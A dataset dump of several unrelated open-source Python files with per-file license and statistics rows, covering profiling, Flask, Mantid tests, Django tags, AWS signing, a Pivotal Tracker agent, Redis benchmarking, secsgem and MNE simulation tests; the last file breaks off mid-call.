Trace = collections.namedtuple('Trace', ['thread_id', 'frame_count', 'frames'])
Frame = collections.namedtuple('Frame', ['bci', 'line_no', 'method_id'])
AGENT_ERRORS = [
"No Java Frames[ERR=0]",
"No class load[ERR=-1]",
"GC Active[ERR=-2]",
"Unknown not Java[ERR=-3]",
"Not walkable not Java[ERR=-4]",
"Unknown Java[ERR=-5]",
"Not walkable Java[ERR=-6]",
"Unknown state[ERR=-7]",
"Thread exit[ERR=-8]",
"Deopt[ERR=-9]",
"Safepoint[ERR=-10]",
]
def parse_hpl_string(fh):
(length,) = struct.unpack('>i', fh.read(4))
(val,) = struct.unpack('>%ss' % length, fh.read(length))
return val.decode('utf-8')
def parse_hpl(filename):
traces = []
methods = {}
for (index, error) in enumerate(AGENT_ERRORS):
method_id = -1 - index
methods[method_id] = Method(method_id, "", "/Error/", error)
with open(filename, 'rb') as fh:
while True:
marker_str = fh.read(1)
if not marker_str:
break
(marker,) = struct.unpack('>b', marker_str)
if marker == 0:
break
elif marker == 1 or marker == 11:
(frame_count, thread_id) = struct.unpack('>iQ', fh.read(4 + 8))
# marker is 11, read the time
if marker == 11:
(time_sec, time_nano) = struct.unpack('>QQ', fh.read(8+8))
if frame_count > 0:
traces.append(Trace(thread_id, frame_count, []))
else: # Negative frame_count are used to report error
if abs(frame_count) > len(AGENT_ERRORS):
method_id = frame_count - 1
methods[method_id] = Method(method_id, "Unknown err[ERR=%s]" % frame_count)
frame = Frame(None, None, frame_count - 1)
traces.append(Trace(thread_id, 1, [frame]))
elif marker == 2:
(bci, method_id) = struct.unpack('>iQ', fh.read(4 + 8))
frame = Frame(bci, None, method_id)
traces[-1].frames.append(frame)
elif marker == 21:
(bci, line_no, method_id) = struct.unpack('>iiQ', fh.read(4 + 4 + 8))
if line_no < 0: # Negative line_no are used to report that line_no is not available (-100 & -101)
line_no = None
frame = Frame(bci, line_no, method_id)
traces[-1].frames.append(frame)
elif marker == 3:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 31:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
class_name_generic = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
method_signature = parse_hpl_string(fh)
method_signature_generic = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 4: # 4 means thread meta, not useful in flame graph
(thread_id,) = struct.unpack('>Q', fh.read(8))
thread_name = parse_hpl_string(fh)
else:
raise Exception("Unexpected marker: %s at offset %s" % (marker, fh.tell()))
return traces, methods
def abbreviate_package(class_name):
match_object = re.match(r'(?P<package>.*\.)(?P<remainder>[^.]+\.[^.]+)$', class_name)
if match_object is None:
return class_name
shortened_pkg = re.sub(r'(\w)\w*', r'\1', match_object.group('package'))
return "%s%s" % (shortened_pkg, match_object.group('remainder'))
def get_method_name(method, shorten_pkgs):
class_name = method.class_name[1:-1].replace('/', '.')
if shorten_pkgs:
class_name = abbreviate_package(class_name)
method_name = class_name
method_name += '.' + method.method_name
return method_name
def format_frame(frame, method, discard_lineno, shorten_pkgs):
formatted_frame = get_method_name(method, shorten_pkgs)
if not discard_lineno and frame.line_no:
formatted_frame += ':' + str(frame.line_no)
return formatted_frame
def main(argv=None, out=sys.stdout):
import argparse
parser = argparse.ArgumentParser(description='Convert an hpl file into Flamegraph collapsed stacks')
parser.add_argument('hpl_file', metavar='FILE', type=str, nargs=1, help='A hpl file')
parser.add_argument('--discard-lineno', dest='discard_lineno', action='store_true', help='Remove line numbers')
parser.add_argument('--discard-thread', dest='discard_thread', action='store_true', help='Remove thread info')
parser.add_argument('--shorten-pkgs', dest='shorten_pkgs', action='store_true', help='Shorten package names')
parser.add_argument('--skip-trace-on-missing-frame', dest='skip_trace_on_missing_frame', action='store_true', help='Continue processing even if frames are missing')
args = parser.parse_args(argv)
filename = args.hpl_file[0]
(traces, methods) = parse_hpl(filename)
folded_stacks = collections.defaultdict(int)
for trace in traces:
frames = []
skip_trace = False
for frame in trace.frames:
if args.skip_trace_on_missing_frame and not frame.method_id in methods:
sys.stderr.write("skipped missing frame %s\n" % frame.method_id)
skip_trace = True
break
frames.append(format_frame(
frame,
methods[frame.method_id],
args.discard_lineno,
args.shorten_pkgs
))
if skip_trace:
continue
if not args.discard_thread:
frames.append('Thread %s' % trace.thread_id)
folded_stack = ';'.join(reversed(frames))
folded_stacks[folded_stack] += 1
for folded_stack in sorted(folded_stacks):
sample_count = folded_stacks[folded_stack]
print("%s %s" % (folded_stack, sample_count), file=out)
return 0
if __name__ == '__main__':
main()
| bsd-2-clause | 1,047,224,140,835,399,000 | 39.226131 | 168 | 0.602998 | false |
AdrienGuille/pyMABED | build_event_browser.py | 1 | 3036 | # coding: utf-8
# std
import time
import argparse
import os
import shutil
# web
from flask import Flask, render_template
from flask_frozen import Freezer
# mabed
import mabed.utils as utils
__author__ = "Adrien Guille"
__email__ = "[email protected]"
event_browser = Flask(__name__, static_folder='browser/static', template_folder='browser/templates')
@event_browser.route('/')
def index():
return render_template('template.html',
events=event_descriptions,
event_impact='[' + ','.join(impact_data) + ']',
k=mabed.k,
theta=mabed.theta,
sigma=mabed.sigma)
if __name__ == '__main__':
p = argparse.ArgumentParser(description='Build event browser')
p.add_argument('i', metavar='input', type=str, help='Input pickle file')
p.add_argument('--o', metavar='output', type=str, help='Output html directory', default=None)
args = p.parse_args()
print('Loading events from %s...' % args.i)
mabed = utils.load_events(args.i)
# format data
print('Preparing data...')
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple()))*1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
related_terms.append(related_term[0]+' ('+str("{0:.2f}".format(related_term[1]))+')')
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
', '.join(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append('['+str(formatted_dates[i])+','+str(value)+']')
impact_data.append('{"key":"' + main_term + '", "values":[' + ','.join(formatted_anomaly) + ']}')
if args.o is not None:
if os.path.exists(args.o):
shutil.rmtree(args.o)
os.makedirs(args.o)
print('Freezing event browser into %s...' % args.o)
event_browser_freezer = Freezer(event_browser)
event_browser.config.update(
FREEZER_DESTINATION=args.o,
FREEZER_RELATIVE_URLS=True,
)
event_browser.debug = False
event_browser.config['ASSETS_DEBUG'] = False
event_browser_freezer.freeze()
print('Done.')
else:
event_browser.run(debug=False, host='localhost', port=2016)
| mit | -3,382,823,232,691,615,000 | 34.717647 | 105 | 0.553689 | false |
mganeva/mantid | qt/python/mantidqt/widgets/codeeditor/test/test_multifileinterpreter.py | 1 | 2516 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2017 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# This file is part of the mantid workbench.
#
#
from __future__ import (absolute_import, unicode_literals)
import unittest
from mantid.py3compat import mock
from mantidqt.utils.qt.testing import GuiTest
from mantidqt.utils.qt.testing.qt_widget_finder import QtWidgetFinder
from mantidqt.widgets.codeeditor.multifileinterpreter import MultiPythonFileInterpreter
MANTID_API_IMPORT = "from mantid.simpleapi import *\n"
PERMISSION_BOX_FUNC = ('mantidqt.widgets.codeeditor.scriptcompatibility.'
'permission_box_to_prepend_import')
class MultiPythonFileInterpreterTest(GuiTest, QtWidgetFinder):
def test_default_contains_single_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
def test_add_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
widget.append_new_editor()
self.assertEqual(2, widget.editor_count)
def test_open_file_in_new_tab_import_added(self):
test_string = "Test file\nLoad()"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertEqual(widget.current_editor().editor.isModified(), True,
msg="Script not marked as modified.")
self.assertIn(MANTID_API_IMPORT, widget.current_editor().editor.text(),
msg="'simpleapi' import not added to script.")
def test_open_file_in_new_tab_no_import_added(self):
test_string = "Test file\n"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertNotIn(MANTID_API_IMPORT,
widget.current_editor().editor.text())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,618,802,130,108,384,000 | 40.933333 | 87 | 0.675278 | false |
matus-stehlik/glowing-batman | base/templatetags/roots_tags.py | 1 | 1874 | from django import template
from django.core.urlresolvers import reverse
from django.conf import settings
from django.template.base import TemplateSyntaxError
register = template.Library()
@register.simple_tag
def url_active(request, urls, *args, **kwargs):
if request.path in (reverse(url, args=list(*args), kwargs=dict(**kwargs))
for url in urls.split()):
return "active"
else:
return ""
@register.filter
def remove_uncomplete_latex(text):
# Even number of segments separated by $$ means uncomplete
# display equation
if len(text.split('$$')) % 2 == 0:
# Return the original text
return '$$'.join(text.split('$$')[:-1])
elif len(text.split('$')) % 2 == 0:
return '$'.join(text.split('$')[:-1])
else:
return text
class DefineNode(template.Node):
def __init__(self, name, nodelist):
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<DefineNode>"
def render(self, context):
context[self.name] = self.nodelist.render(context)
return ''
@register.tag
def define(parser, token):
"""
Adds a name to the context for referencing an arbitrarily defined block
of template code.
For example:
{% define my_block %}
This is the content.
{% enddefine %}
Now anywhere in the template:
{{ my_block }}
"""
bits = list(token.split_contents())
if len(bits) != 2:
raise TemplateSyntaxError("Expected format is: {% define variable %}")
name = bits[1]
nodelist = parser.parse(('enddefine',))
parser.delete_first_token()
return DefineNode(name, nodelist)
@register.filter
def access(value, arg):
return value.get(arg, {})
@register.simple_tag
def settings_value(name):
return getattr(settings, name, "")
| mit | -6,420,556,990,031,565,000 | 22.425 | 78 | 0.61953 | false |
nfcharles/python-aws-sign | aws_sign/v4/__init__.py | 1 | 1295 | from .. import ServiceConstants
class Sigv4ServiceConstants(ServiceConstants):
"""Logical grouping of Signature Version 4 service constants
This class sets the appropriate Signature v4 specific parameters required
for signing.
"""
# Minimum required headers for signature v4 signed requests
__REQUIRED_HEADERS = {'host': None, 'x-amz-date': None}
def __init__(self, scheme, host, service, region):
"""Initializes v4 specific constants
Parameters
host: service host
service: service name
region: service region
"""
super(Sigv4ServiceConstants, self).__init__(scheme,
host,
service,
region,
algorithm='AWS4-HMAC-SHA256',
signing='aws4_request')
self.__headers = self._merge(super(Sigv4ServiceConstants, self).headers,
self.__REQUIRED_HEADERS,
{'host': self.host})
@property
def headers(self):
return self.__headers
| mit | -6,848,493,036,127,987,000 | 37.088235 | 81 | 0.484942 | false |
CognizantOneDevOps/Insights | PlatformAgents/com/cognizant/devops/platformagents/agents/alm/pivotaltracker/PivotalTrackerAgent3.py | 1 | 16890 |
#-------------------------------------------------------------------------------
# Copyright 2017 Cognizant Technology Solutions
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#-------------------------------------------------------------------------------
'''
Created on May 9, 2018
@author: 476693
'''
from ....core.BaseAgent3 import BaseAgent
import time
import requests
import json
import datetime
from dateutil import parser
class PivotalTrackerAgent(BaseAgent):
@BaseAgent.timed
def process(self):
self.setUpVariables()
self.login()
self.getProjectList()
self.getAllEpics()
self.storyDataCollection()
self.getIterationData()
if self.config.get('getAllActivity', False):
self.getAllActivities()
if self.config.get('getAllMembers', False):
self.getAllMembers()
def getAllMembers(self):
self.memberData = []
memeber_relation_metadata = {"labels" : ["LATEST"],
"relation" : {"name" : "MEMBER_DETAILS",
"properties" : ["ownerId", "memeberName", "memeberEmail"],
"source" : {"constraints" : ["projectId", "memeberName"] },
"destination" : { "constraints" : ["ownerId"]}}}
for project in self.all_projects:
projectId = str(project.get('projectId'))
memberships = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId +"/memberships",
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for member in memberships:
injectData = {}
injectData['projectId'] = projectId
injectData['ownerId'] = member.get('person', {}).get('id')
injectData['memeberName'] = member.get('person', {}).get('name')
injectData['memeberEmail'] = member.get('person', {}).get('email')
injectData['memeberUserName'] = member.get('person', {}).get('username')
self.memberData.append(injectData)
self.publishToolsData(self.memberData, memeber_relation_metadata)
def getAllActivities(self):
self.allActivitiesData = []
for project in self.all_projects:
projectId = str(project.get('projectId'))
activityCollection = True
offset = 0
startFrom = self.tracking.get('trackingInfo', {}).get(str(projectId), {}).get('lastActivityDate', self.startFrom)
lastUpdatedDate = 0
while activityCollection:
activities = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId + "/activity"
+"?occurred_after=" + startFrom + "&limit=200&offset=" + str(offset),
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
offset = offset + 200
if len(activities) > 0:
latest_update_time = int(time.mktime(time.strptime(activities[0]['occurred_at'], self.timeStampFormat)))
if lastUpdatedDate < latest_update_time:
lastUpdatedDate = latest_update_time
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
trackingDetails['lastActivityDate'] = activities[0]['occurred_at']
for activity in activities:
injectData = {}
injectData['projectId'] = projectId
injectData['nodeType'] = 'activity update'
dateCheck = lambda lastUpdatedDate: activity.get('occurred_at', '')
if self.startFrom < latest_update_time:
activity.get('occurred_at', '')
else :
lastUpdatedDate=dateCheck(activity.get('occurred_at', ''))
if 'primary_resources' in activity:
injectData['key'] = activity.get('primary_resources')[0].get('id', '')
injectData['storyName'] = activity.get('primary_resources')[0].get('name', '')
injectData['storyType'] = activity.get('primary_resources')[0].get('story_type', '')
if len( activity.get('changes') ) > 0:
for change in activity.get('changes'):
injectData['occurredAt'] = activity.get('occurred_at','')
injectData['kind'] = activity.get('kind','')
#injectData['storyState'] = activity.get('current_state','')
injectData['message'] = activity.get('message','')
if 'original_values' in change and 'estimate' in change['original_values']:
injectData['storyPoint'] = change['new_values']['estimate']
elif 'original_values' in change and 'current_state' in change['original_values']:
injectData['storyState'] = change['new_values']['current_state']
elif 'new_values' in change and 'description' in change['new_values']:
injectData['description'] = change['new_values']['description']
if 'new_values' in change and 'commit_identifier' in change.get('new_values'):
injectData['attachedCommitId'] = change['new_values']['commit_identifier']
injectData['attachedScmType'] = change['new_values']['commit_type']
injectData['attachedCommitMessage'] = change['new_values']['text']
self.allActivitiesData += self.parseResponse(self.activityResponseTemplate, activity, injectData)
if len(activities) == 0:
activityCollection = False
if len(activities)> 0:
self.tracking['trackingInfo'][(projectId)] = trackingDetails
activityinsighstTimeX = self.config.get('dynamicTemplate', {}).get('activity',{}).get('insightsTimeXFieldMapping',None)
timestamp = activityinsighstTimeX.get('timefield',None)
timeformat = activityinsighstTimeX.get('timeformat',None)
isEpoch = activityinsighstTimeX.get('isEpoch',False)
self.publishToolsData(self.allActivitiesData,self.activityMetadata,timestamp,timeformat,isEpoch,True)
#self.publishToolsData(self.allActivitiesData,self.activityRelationMetadata)
self.updateTrackingJson(self.tracking)
def getAllEpics(self):
self.epics = {}
for project in self.all_projects:
projectId = str(project.get('projectId'))
epics = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId + "/epics" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
epic_list = []
for epic in epics:
epic_list.append(epic.get('label', {}).get('name', ''))
self.epics[projectId] = epic_list
def storyDataCollection(self):
story_update_activity_category = ["story_update_activity", "comment_create_activity"]
for project in self.all_projects:
projectId = str(project.get('projectId'))
dataCollection = True
offset = 0
startFrom = self.tracking.get('trackingInfo', {}).get(str(projectId), {}).get('lastUpdatedDate', self.startFrom)
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
lastUpdatedDate = 0
while dataCollection:
storyDetails = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId +
"/stories?updated_after=" + startFrom + "&limit=200&offset=" + str(offset)
,'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
offset = offset + 200
self.storyPublishData = []
for story in storyDetails:
latest_update_time = int(time.mktime(time.strptime(story.get('updated_at'), self.timeStampFormat)))
if lastUpdatedDate < latest_update_time:
lastUpdatedDate = latest_update_time
trackingDetails['lastUpdatedDate'] = story.get('updated_at')
injectData = {}
epicName = [i['name'] for i in story.get('labels', [])]
injectData['epicName'] = epicName
#dateCheck = lambda lastUpdatedDate: story.get('updated_at', '')
#if self.startFrom < latest_update_time:
#story.get('updated_at', '')
#else :
#lastUpdatedDate=dateCheck(story.get('updated_at', ''))
self.storyPublishData += self.parseResponse(self.storyResponseTemplate, story, injectData)
if len(storyDetails) == 0:
dataCollection = False
self.tracking['trackingInfo'][str(projectId)] = trackingDetails
self.publishToolsData(self.storyPublishData, self.storyMetadata)
self.updateTrackingJson(self.tracking)
def getIterationData(self):
self.storyInBacklog = {}
for project in self.all_projects:
projectId = str(project.get('projectId'))
backlogData = self.getResponse(self.baseEndPoint + "/services/v5/projects/" + projectId +
'/iterations?scope=backlog',
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
if len(backlogData) > 0 and len(backlogData[0]['stories']) > 0:
stories = []
for story in backlogData[0]['stories']:
stories.append(story.get('id'))
self.storyInBacklog[projectId] = stories
lastIteration = self.tracking.get('trackingInfo', {}).get(projectId, {}).get('iteration', 0)
iterationContinue = True
self.iteration_data = []
while iterationContinue:
iterations = self.getResponse(self.baseEndPoint + '/services/v5/projects/' + \
(projectId) + '/iterations?limit=20'+'&offset='+str(lastIteration) + \
'&fields=number%2C' \
'project_id%2Clength%2Cteam_strength%2Cstories%2C' \
'start%2Cfinish%2Ckind%2Cvelocity%2Canalytics',
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
lastIteration = lastIteration + 20
for iteration in iterations:
current_iteration_number = iteration.get('number', '') or 0
if 'stories' in iteration:
for story in iteration.get('stories', []):
injectDataIteration = {}
injectDataIteration['key'] = story.get('id', '')
if story.get('id') in self.storyInBacklog[projectId]:
injectDataIteration['backLog'] = True
self.iteration_data += self.parseResponse(self.iterationResponseTemplate, iteration, injectDataIteration)
if len(iterations) !=0:
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
trackingDetails['iteration'] = current_iteration_number
self.tracking['trackingInfo'][projectId] = trackingDetails
else :
iterationContinue = False
iterationinsighstTimeX = self.config.get('dynamicTemplate', {}).get('iteration',{}).get('insightsTimeXFieldMapping',None)
timestamp = iterationinsighstTimeX.get('timefield',None)
timeformat = iterationinsighstTimeX.get('timeformat',None)
isEpoch = iterationinsighstTimeX.get('isEpoch',False)
self.publishToolsData(self.iteration_data,self.relationMetadata,timestamp,timeformat,isEpoch,True)
self.updateTrackingJson(self.tracking)
def getProjectList(self):
trackingDetails = self.tracking
trackingData = {}
allWorkspaces = self.getResponse(self.baseEndPoint + "/services/v5/my/workspaces" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for workspace in allWorkspaces:
for project_id in workspace.get('project_ids', []):
tempDict = {}
tempDict['workspaceName'] = workspace.get('name')
tempDict['projectId'] = project_id
self.all_projects.append(tempDict)
if project_id:
trackingData[project_id] = {}
all_projects = self.getResponse(self.baseEndPoint + "/services/v5/projects" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for project in all_projects:
tempDict = {}
tempDict['workspaceName'] = None
tempDict['projectId'] = project.get('id', None)
project_id = tempDict['projectId']
tempDict['projectName'] = project.get('name', None)
if project_id:
if not trackingDetails.get('trackingInfo',None):
trackingData[str(project_id)] = {}
trackingDetails['trackingInfo'] = trackingData
self.updateTrackingJson(trackingDetails)
self.all_projects.append(tempDict)
def setUpVariables(self):
self.userid = self.config.get('userid', '')
self.password = self.config.get('passwd', '')
accessToken = self.config.get('token')
self.baseEndPoint = self.config.get('baseEndPoint', '')
self.reqHeaders = {'x-trackertoken': accessToken}
self.timeStampFormat = self.config.get('timeStampFormat')
startFrom = self.config.get("startFrom", '')
startFrom = parser.parse(startFrom)
self.startFrom = startFrom.strftime(self.timeStampFormat)
self.all_projects = []
self.iterationResponseTemplate = self.config.get('dynamicTemplate', {}).get('iterationResponseTemplate', {})
self.relationMetadata = self.config.get('dynamicTemplate', {}).get('relationMetadata', None)
self.storyMetadata = self.config.get('dynamicTemplate', {}).get('storyMetadata', None)
self.storyResponseTemplate = self.config.get('dynamicTemplate', {}).get('responseTemplate', None)
self.activityResponseTemplate = self.config.get('dynamicTemplate', {}).get('activityResponseTemplate', None)
#self.activityRelationMetadata = self.config.get('dynamicTemplate', {}).get('activityRelationMetadata', None)
self.activityMetadata = self.config.get('dynamicTemplate', {}).get('activityResponseTemplate', {}).get('ActivityMetadata', None)
def login(self):
userid = self.getCredential("userid")
password = self.getCredential("passwd")
accessToken = self.getCredential("accesstoken")
baseEndPoint = self.config.get('baseEndPoint', '')
reqHeaders = {'x-trackertoken': accessToken}
trackingDetails = self.tracking
loginResponse = self.getResponse(baseEndPoint + "/services/v5/me" ,
'GET', userid, password, None, reqHeaders=reqHeaders)
if loginResponse:
currentState = str(time.time()) + " - Logged in successfully"
else:
currentState = str(time.time()) + " - Unable to login using config credentials."
trackingDetails["toolInfo"] = currentState
self.updateTrackingJson(trackingDetails)
if __name__ == "__main__":
PivotalTrackerAgent()
| apache-2.0 | 4,832,219,274,571,249,000 | 58.055944 | 139 | 0.562937 | false |
lzhjie/benchmark | client_redis.py | 1 | 1166 | # coding: utf-8
# Copyright (C) zhongjie luo <[email protected]>
import redis
from db_bench import DbConnection, multi_process_bench, Options
class StrictRedis(DbConnection):
def __init__(self, options):
super(StrictRedis, self).__init__(options)
self.__db = 0
self.__client = None
def connect(self):
self.__client = redis.StrictRedis(self.host, self.port, self.__db)
def disconnect(self):
self.__client = None
def insert(self, record):
k, v = record[0]
return self.__client.set(str(k), str(v), nx=True) == True
def search(self, record):
k, v = record[0]
return self.__client.get(str(k)) == str(v)
def delete(self, record):
k, v = record[0]
return self.__client.delete(str(k)) == True
def tear_down(self):
self.__client.flushdb()
def api_example():
pass
if __name__ == "__main__":
option = Options()
option.set("port", 6379)
if option.parse_option() is False:
exit(100)
print(option)
result = multi_process_bench(option, StrictRedis)
# print result
| mit | 9,135,346,619,652,901,000 | 22.808511 | 74 | 0.56518 | false |
bparzella/secsgem | secsgem/secs/data_items/objid.py | 1 | 1674 | #####################################################################
# objid.py
#
# (c) Copyright 2021, Benjamin Parzella. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#####################################################################
"""OBJID data item."""
from .. import variables
from .base import DataItemBase
class OBJID(DataItemBase):
"""
Object identifier.
:Types:
- :class:`String <secsgem.secs.variables.String>`
- :class:`U8 <secsgem.secs.variables.U8>`
- :class:`U1 <secsgem.secs.variables.U1>`
- :class:`U2 <secsgem.secs.variables.U2>`
- :class:`U4 <secsgem.secs.variables.U4>`
**Used In Function**
- :class:`SecsS01F19 <secsgem.secs.functions.SecsS01F19>`
- :class:`SecsS14F01 <secsgem.secs.functions.SecsS14F01>`
- :class:`SecsS14F02 <secsgem.secs.functions.SecsS14F02>`
- :class:`SecsS14F03 <secsgem.secs.functions.SecsS14F03>`
- :class:`SecsS14F04 <secsgem.secs.functions.SecsS14F04>`
"""
__type__ = variables.Dynamic
__allowedtypes__ = [
variables.U1,
variables.U2,
variables.U4,
variables.U8,
variables.String
]
| lgpl-2.1 | -4,627,299,520,120,166,000 | 33.875 | 69 | 0.61828 | false |
jaeilepp/mne-python | mne/simulation/tests/test_raw.py | 1 | 13124 | # Authors: Mark Wronkiewicz <[email protected]>
# Yousra Bekhti <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
from copy import deepcopy
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
from nose.tools import assert_true, assert_raises, assert_equal
from mne import (read_source_spaces, pick_types, read_trans, read_cov,
make_sphere_model, create_info, setup_volume_source_space,
find_events, Epochs, fit_dipole, transform_surface_to,
make_ad_hoc_cov, SourceEstimate, setup_source_space)
from mne.chpi import _calculate_chpi_positions, read_head_pos, _get_hpi_info
from mne.tests.test_chpi import _assert_quats
from mne.datasets import testing
from mne.simulation import simulate_sparse_stc, simulate_raw
from mne.io import read_raw_fif, RawArray
from mne.time_frequency import psd_welch
from mne.utils import _TempDir, run_tests_if_main, slow_test
warnings.simplefilter('always')
data_path = testing.data_path(download=False)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif')
cov_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-cov.fif')
trans_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = op.join(data_path, 'subjects')
bem_path = op.join(subjects_dir, 'sample', 'bem')
src_fname = op.join(bem_path, 'sample-oct-2-src.fif')
bem_fname = op.join(bem_path, 'sample-320-320-320-bem-sol.fif')
raw_chpi_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw_subsampled.pos')
def _make_stc(raw, src):
"""Helper to make a STC."""
seed = 42
sfreq = raw.info['sfreq'] # Hz
tstep = 1. / sfreq
n_samples = len(raw.times) // 10
times = np.arange(0, n_samples) * tstep
stc = simulate_sparse_stc(src, 10, times, random_state=seed)
return stc
def _get_data():
"""Helper to get some starting data."""
# raw with ECG channel
raw = read_raw_fif(raw_fname).crop(0., 5.0).load_data()
data_picks = pick_types(raw.info, meg=True, eeg=True)
other_picks = pick_types(raw.info, meg=False, stim=True, eog=True)
picks = np.sort(np.concatenate((data_picks[::16], other_picks)))
raw = raw.pick_channels([raw.ch_names[p] for p in picks])
raw.info.normalize_proj()
ecg = RawArray(np.zeros((1, len(raw.times))),
create_info(['ECG 063'], raw.info['sfreq'], 'ecg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass', 'dig'):
ecg.info[key] = raw.info[key]
raw.add_channels([ecg])
src = read_source_spaces(src_fname)
trans = read_trans(trans_fname)
sphere = make_sphere_model('auto', 'auto', raw.info)
stc = _make_stc(raw, src)
return raw, src, stc, trans, sphere
@testing.requires_testing_data
def test_simulate_raw_sphere():
"""Test simulation of raw data with sphere model."""
seed = 42
raw, src, stc, trans, sphere = _get_data()
assert_true(len(pick_types(raw.info, meg=False, ecg=True)) == 1)
# head pos
head_pos_sim = dict()
# these will be at 1., 2., ... sec
shifts = [[0.001, 0., -0.001], [-0.001, 0.001, 0.]]
for time_key, shift in enumerate(shifts):
# Create 4x4 matrix transform and normalize
temp_trans = deepcopy(raw.info['dev_head_t'])
temp_trans['trans'][:3, 3] += shift
head_pos_sim[time_key + 1.] = temp_trans['trans']
#
# Test raw simulation with basic parameters
#
raw_sim = simulate_raw(raw, stc, trans, src, sphere, read_cov(cov_fname),
head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
raw_sim_2 = simulate_raw(raw, stc, trans_fname, src_fname, sphere,
cov_fname, head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
assert_array_equal(raw_sim_2[:][0], raw_sim[:][0])
# Test IO on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'sim_test_raw.fif')
raw_sim.save(test_outname)
raw_sim_loaded = read_raw_fif(test_outname, preload=True)
assert_allclose(raw_sim_loaded[:][0], raw_sim[:][0], rtol=1e-6, atol=1e-20)
del raw_sim, raw_sim_2
# with no cov (no noise) but with artifacts, most time periods should match
# but the EOG/ECG channels should not
for ecg, eog in ((True, False), (False, True), (True, True)):
raw_sim_3 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=eog, ecg=ecg, random_state=seed)
raw_sim_4 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=False, ecg=False, random_state=seed)
picks = np.arange(len(raw.ch_names))
diff_picks = pick_types(raw.info, meg=False, ecg=ecg, eog=eog)
these_picks = np.setdiff1d(picks, diff_picks)
close = np.isclose(raw_sim_3[these_picks][0],
raw_sim_4[these_picks][0], atol=1e-20)
assert_true(np.mean(close) > 0.7)
far = ~np.isclose(raw_sim_3[diff_picks][0],
raw_sim_4[diff_picks][0], atol=1e-20)
assert_true(np.mean(far) > 0.99)
del raw_sim_3, raw_sim_4
# make sure it works with EEG-only and MEG-only
raw_sim_meg = simulate_raw(raw.copy().pick_types(meg=True, eeg=False),
